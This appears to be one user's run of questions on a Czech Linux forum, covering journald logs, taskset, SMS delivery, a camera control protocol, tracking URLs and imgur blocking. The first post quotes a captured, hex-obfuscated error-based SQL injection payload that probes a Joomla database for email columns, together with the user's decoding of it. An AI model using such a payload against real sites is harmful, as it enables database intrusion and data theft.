Témata

31

Software / SQL deobfuscátor

« kdy: 23. 10. 2022, 23:44:31 »

Existuj SQL deobfuscátor?

Kód: [Vybrat]

13+  AND (SELECT 5808 FROM(SELECT COUNT(*),CONCAT(0x54736d46,(SELECT MID(IFNULL(CAST(COLUMN_NAME AS NCHAR),0x20),1,55) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=0x7679706164656b AND TABLE_NAME=0x6a6f735f62616e6e6572636c69656e74 AND COLUMN_NAME LIKE (0x25656d61696c25) AND COLUMN_NAME NOT LIKE (0x256c61737425) AND COLUMN_NAME NOT LIKE (0x256461746525) AND COLUMN_NAME NOT LIKE (0x2574696d6525) AND COLUMN_NAME NOT LIKE (0x2573746174757325) AND COLUMN_NAME NOT LIKE (0x25737562736372697074696f6e25) LIMIT 1),0x4e49746c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Aspoň 0x jsem přes perl nahradil...

Kód: [Vybrat]

["TsmF", " ", "vypadek", "jos_bannerclient", "%email%", "%last%", "%date%", "%time%", "%status%", "%subscription%", "NItl"]

32

Software / Organizace souborů ve /var/log/journal

« kdy: 21. 10. 2022, 15:48:22 »

Mám komplexnější dotaz ohledně dřívějších záznamů(z předešlých bootuů) na záznamy dmesg a journactl.
1. Jak dlouho se uchovávají v /var/log/journal?
2. jaký je význam  bezprostředního adresáře journal/RANDOM_HEX (je tam jen jeden).
Dál už uvažuji jen v tomto adresáři. Je  tam dost souborů  8MBa 16MB.
Začínají system@ a user-1000@ ,, z toho jsem pochopil, že první je ekvival. dmesg nebo journalctl -k.
Ale část za @ se liší:
0005ea7587e9a2a4-1944b2e2936e8ca4.journal~
0037673c0a164c35b1e16ea38b972896-00000000000015ab-0005b8c92f88f975.journal
user-1000.journal (bez @) a system.journal
Nejsou tam žádné symlinky.

Co znamená poslední znak ~ ?
Jaká je jejich časová soushlednost (bohužel systému nejdou hodinyRTC, takže data neodpovídají). Ale třeba hodinu po bootu se ručně nastaví čas na správný.

Existuje nějaká možnost jak vypsat detaily každého souboru, odkdy dokdy tam jsou záznamy?
Je možnost hledat v všech souborech naráz v určitém rozpětí dat


jaký je význam  v *.journal bez ~  koncové části 3dfa972ac65e4018acd9d6882978be07-000000000000046f-0005dd290e402ffa,
ea22e21698d54068b5e06cfee961cfcc-0000000000001002-0005df9cda5849b7 ?
Vypadá to jako když 1.část je random, druhá nějaká nízká série a třetí  (skoro !)odpovídá
souborů s tildou ~ user-1000@0005dd290e312b68-ac708be4d17ce1bc.journal~

33

Distribuce / V Debianu nefunguje taskset time příkaz

« kdy: 20. 10. 2022, 19:41:23 »

Z jakého důvodu v debianu nejde příkaz

Kód: [Vybrat]

taskset -c 0 time grep -r bla..._.+ dir

Hlásí to taskset: failed to execute time :Adresář/složka neexistuje

Na Ubuntu to jde.

Do toho mám druhý dotaz, proč vrací forma tasket time příkaz patičku kde chybí nové řádky a tabulátory? Narážím na tu ztrátu formátování mezer, řádků oproti běžnému příkazu time whoami, který je na 3 řádku úhledně a tabulátory zajíštují i sloupcový vzhled..

Kód: [Vybrat]

Výstup        z 
  programu ještě s zachovanými
   mezery       a tabulátory.
KONEC PROGRAMU10.21user 0.00system 0:4.21elapsed 99%CPU

Mimochodem: přehození time na začátek taky jde na obou platformách. Ale setkal jsem se další zvláštností, že nějak výsledky real/user/sys byly nekonzistentní v tom smyslu, že občas byl user čas skoro nulový, když normálně se téměř rovná času real. Bohužel nemohu zreprodukovat.

To by se vysvětlilo čím? Tipoval bych něco směrem, že úloha se přesunula na jiný cpu...což je věc náhody a možná aktuálního zátěže systému.

34

Odkladiště / Existuje typ SMS, který přijde jen když je telefon v tu dobu zapnutý?

« kdy: 04. 10. 2022, 22:13:35 »

Když mám vypnutý mobil, tak jednorázové SMS mi nepřijdou ani později (ani ty co by se vešly do časového limitu x minut pro zadání do bankovnictví v době zaputí telefonu). Čím to je? Je to na straně telefonu, operátora nebo autora SMS? Je to nějaký flag, který určuje, že SMS


A jak technicky příjem SMS probíhá? Něco na způsob TCP, že telefon povrdí příjem?. Posílá rovnou BTS text zprávy nebo nejdřív navazuje spojení?

35

/dev/null / XML <camrply> Framework na ovládání kamer a foťáků "cam.cgi?mode=*&value="

« kdy: 20. 09. 2022, 15:21:06 »

Něco podobného jsem viděl u víc kamer různých značek, neexistuje nějaká specifikace, nebo software (klikací) k ovládání kamer co umí takovýhle protokol ??

Našel jsem 2 podobné
https://github.com/cleverfox/lumixproto (PANASONIC GX80)
A GOPRO hero
https://github.com/KonradIT/goprowifihack/blob/master/HERO6/HERO6-Commands.md

Je to XML , tagy camrply , url cam.cgi a jednoduché parametry mode a value
 (jasně v tom druhém json a cool URL)

http://192.168.1.60/cam.cgi?mode=getstate

Kód: [Vybrat]

<camrply>
<result>ok</result>
<state>
<batt>2/3</batt>
<cammode>rec</cammode>
<remaincapacity>16816</remaincapacity>
...
</state>
</camrply>

Nebo
cam.cgi?mode=getinfo&type=capability

Kód: [Vybrat]

 
camrply>
<result>ok</result>
<comm_proto_ver>1.4</comm_proto_ver>
<productinfo>
...
</productinfo>
<camcmdlist>
<camcmd>tele-normal</camcmd>

<camcmd>wide-fast</camcmd>
</camcmdlist>
<camspeclist>
...
</camspeclist>
<asst_disp>
<disp_mag min="300" max="1000"/>
<pinp_mag min="300" max="600"/>
</asst_disp>
...
</videoquality>
<videoquality name="4K/24p" value="mp4_24p_100mbps_4k">
...
</videoquality>
<videoquality name="FHD/60p" value="mp4_60p_28mbps">
<framerate name="60fps" value="60"/>


...
</videoquality>
</stopmotionlist>
</stopmotiontset>
<contents_action_info >
...
</contents_action_info>
</camrply>

Ovládání:

http://10.5.5.9/gp/gpControl/command/shutter?p=1
/cam.cgi?mode=camcmd&value=video_recstart

36

/dev/null / Iva z seznam.cz

« kdy: 20. 08. 2022, 13:00:47 »

Můj logger zachytil u někoho doménu  a.iva.seznam.cz. tipl bych že je to max 3.měs. staré. Nevíte o co jde? Vyhledávače nic mi nenašly

37

Odkladiště / Co je to za aktéra

« kdy: 16. 07. 2022, 22:18:57 »

Co je zač tento xmhttprequest?

https://m.facebook.com/actor_validate/voice_validate/?screen_uri=https%3A%2F%2Fm.facebook.com%2Fhome.php%3Ftbua%3D1

Dřív(mesíc a víc ) jsem ho nepozoroval. Bohužel nemám vývojářské nástrojeprohlížeče  na mobilu  a tak se ptám takhle partyzánsky.. Navíc debuggovat facebook.com/rsrc.php je něco jako luštit čínskí písmo poházené po vichřici


A mimojiné, nevíte, proč došlo ke změně URL Neděje se to v GROUP, ale na postech lidí):
https://m.facebook.com/notifications#!/story.php?story_fbid=pfbid02NějakáLikebase64&id=CISLO_ZACINAJICI

z původního
https://www.facebook.com/NAZEV_PAGE/posts/CISLO_POSTU_ZACINAJICI1000


Nemyslím vůbec ten #! HASBANG i když ten mě taky SE*E.. Jde mi o to, že v současn formě _pfbidblabla nedostanu to CISLO_POSTU a podle mě může obsahovat cosi

A to teď uplně schovávám rant na "hlučnost" odkazů z(/na) facebooku, hlavně sledovací linky l.facebook při odkazu v postu na jiný server, na odkazy na posty na timeline (spousta sledovacích parametrů) a ani nezminuji lamy ,které do mailů nebo mimo walled.raden.facebook pouzívají linky ukončené ?gfbclid=

38

O serveru Root.cz / Hledám článek o USB-C nabíječkách feat EU

« kdy: 17. 05. 2022, 13:01:05 »

Zahlédl jsem v kolotoči  nadpis článku obsahující slova nabíječky a parlement, myslím, že tam bylo že je na root.cz
(třeba se pletu, bylo to lupa.cz, dokonce mohlo jít i o Zprávičku), jenže kolotoč je neposedný a točí se a článek asi z něj vylít, když jsem ho chtěl najít...


Pokud jsou v kolotoči články cca měsíc staré maximálně (spíš bych řekl max týden), tak by to mělo být ze včera.
 
Zkoušel jsem hledat podle nálepek(//n/) usbc,usb-c, usb, nabíjení,nabíječka, nabíječky,eu,unie,apple ale nenašel.

O starších článkách vím:
9/2021 Evropská komise chce jednotnou nabíječku s USB-C a Power Delivery
2020 EU schválila jednotné nabíječky, x86 CPU Zhaoxin KaiXian jdou do prodeje
(taky vím o buzzu kolem přechodu z Applu na USB-C, ale mě nějaká gadgetová firma prodávající "batohy" na ajfony a bezdrátové puky nezajímá)

Nebyl tu tedy poslední týden článek / novinka o nabíječkách/nabíjecích standardech a  schválení  "Unií" ?

39

Odkladiště / Odlišné PNG na apple (zprávička)

« kdy: 17. 05. 2022, 12:10:12 »

U této novinky PNG může vypadat jinak na Apple a na jiných zařízeních - root.cz, znamená to, že ten jiný obrázek se ukáže vždy a nebo s určitou pravděpodobností? (Byla tam zmínka o paralelním dekodéru a race condition)

40

Vývoj / Co je no-code a low code?

« kdy: 15. 05. 2022, 11:26:04 »

Co je zač low code a no code?  Spojení používat no-code asi nemůže znamenat neprogramovat a pochybuji že lowcode je něco jako kód úrovně uklízečky

41

/dev/null / atari na googlu

« kdy: 19. 04. 2022, 10:30:52 »

Co je účel toho atari??
www.gstatic.com/_/atari/_
https://www.gstatic.com/_/atari/_/ss/k=atari.vw.Oxn_M4mNxGc.L.W.O/d=1/rs=AGEqA5lqK5-rrl-tileuhLAHnr3xldHshw
https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.LnIH3-2E3tk.O/d=1/rs=AGEqA5lpMpmWIReh1NnoAEfdwE7KrMuRyg/m=view

Je tam  eS eS i  jé es.

42

Windows a jiné systémy / Jak na speciální znaky na fyzické klávesnici Android?

« kdy: 05. 04. 2022, 15:04:07 »

V rámci zrychlování počtu úhozú a přiblížení se písařkám profesionálním na Smartphonu androidu s fyzickou klávesnicí (psát dotikově snad nad 0.3 Hz nejde) bych rád zjistil
JAK PSÁT SPECIALNÍ ZNAKY
Jde o znaky ,které se na dotykové klávesnici píšou pomocí  modifikátoru ?123 nebo  /=<  ale i podržním znakua které nemají ekivalent v Alt+číslo (Takže třeba  téměř jakákoli interpunkce@#€%&-+()*"'::;!?? ~`••√ππ÷׶∆£$¢¢^°{{} \©®™℅[])

Přijde mi směšné / schizofrenní / trapné, že na dotykové klávsnici lze geniálně jednoduše psát jedním respektíve dvěma dotyky(nebo se swajpem) navíc  ihned 16 respektive 26 znaků. Zatímco na fyzické klávesnici si s ALT / ALT + SHIFT + písmeno mohu leda vytřít sklíčko


(ano neomlouvá to, že možná dobrá půlka znaků je na fyczické klávesnici napravo od písmen nebo přes ALT+čísla)
Neexistuje jak při použití fyzické klávesnici androidu psát tyto znaky pžes důvěrně známý layou po přepnutí modifikátoru ?123 nebo \=<?


POZOR:
Problém se netýká US layoutu (tam funguje Alt+ písmeno)... já potřebuji český layout a k tomu dokonce QWERTZ (na fyzické mám jen QWERTY)
Na českém layoutu jsou ALT + písmeno hluché

43

Windows a jiné systémy / Co jsou zač soubory %TEMP%\_te09AF.tmp?

« kdy: 05. 04. 2022, 09:06:27 »

Otázka detektivní  je v nadpisu: co jsou zač soubory _teXXXX.tmp (X=0-9,A-F) v složce %TEMP% uživatele? Mají velký rozptyl velikosti :4k,16k,20k,desítky MB. Max  367MB.  Průměr 80 MB, medián . Jde o 40 souborů. Prostřední polovina (kvartil nebo co - prostě 11. až 30.soubor) má velikosti 211MB až 16kb .  17 souborů nad 90MB, 20 souborů pod 100kb
Vznikly mi tam včera a dnes. Jejich struktura je nejasné, binární smetí, očas nějaká posloupnost ASCII-takové to 7890ABCDEF. po 4Bajtech (ale ne všechny soubory mají stejný "zjev"). Snad jen že v některých se na začátku opaku je HEX DF040204. Žádný čitelný string. Časy vzniku jsou v klastrech - například 5 souborů ve stejnou minutu. TO  by nahrávalo že vznikají při spouštení nějakého frekventovaě používaného programu...

Napadá vás něco? Něco jako databáze náhledů/index? Dumpy Mozilly, něco z Libreoffice/smetí z ghostscriptu???

Otázka míří spíš směrem zda podle názvu někdo bude vědět co je vytváří

44

Software / Při použití adBlocku nefunguje imgur.com

« kdy: 15. 03. 2022, 17:25:31 »

Nefungují mi obrázky naimgur.com. nevíte to odháčkovat když mám uBlock origin a stránka načítá smradlavé skripty jako px.js?ch={1,2} ,domény p.imgur/imageview.gif
"T.imgur.com/"
A asi 10 zprofanovyých alexametrics,medialab.ai wankserve,sciorhrfcardresearvh.com


V nejhorším případě znáze nějaký downloader z této žumpy (to to fašisti dopracovali, na zobrazení obrázku musí býtstahovač jako fbdown.com,getfbvid.com)


Ublock má 1 js recept imgur.com##+js(set-constant, ADBLOCKED, false)

Ukážese mi šedá obrazovka a  nebo problikne
orámeček s patičkou ale obrázek se neotevře (zkusil jsem vypnout kosm.blokování, povolit vše na *.imgur

(https://api.imgur.com/post/v1/media/xyzI?client_id=546c25a59c5ad7&include=media%2Cadconfig%2Caccount se načte )

45

/dev/null / Co je tohle za kolečko?

« kdy: 10. 03. 2022, 23:54:10 »

To je nějaký nový Trik?
Pouze jsem udělal vyhledání společných řetězců-.
$CESTA=audio/128/default.mp3/default.mp3
$UID=3e43d072-f8a5-430f-bc8e-4c70aafdf3c7
$WID=8d82c206-011d-4e1d-b49a-21b0563c9c40
$OCASEK=aid=rss_feed&awCollectionId=<$UID>&awEpisodeId=<$WID>&feed=l2i9YnTd
$NYTURL=nyt.simplecastaudio.com/<$UID>/episodes/<$WID>/<$-CESTA>
$URL-3=pdst.fm/e/<$NYTURL>?<$OCASEK>
$URL-2=chrt.fm/track/8DB4DB/<$URL-3>


Vstup:
1. https://dts.podtrac.com/redirect.mp3/<$URL-2>

2. https://<$URL-2>

3. https://<$URL-3>

4. https://<$NYTURL>?<$OCASEK>

5. https://nyt-injected.simplecastaudio.com/<$UID>/episodes/<$WID>/<$-CESTA>_a273d25c028a9a4f8583a9b5fe05c83d_34812301.mp3?<$OCASEK>&hash_redirect=1&x-total-bytes=34882321&x-ais-classified=streaming&listeningSessionID=0CD_382_68__d236e98a1068a1db48b9b4a62349aaaa07803d4c


(z jedničky se nelze dostat na pětku , ale aspoň na čtyřku.)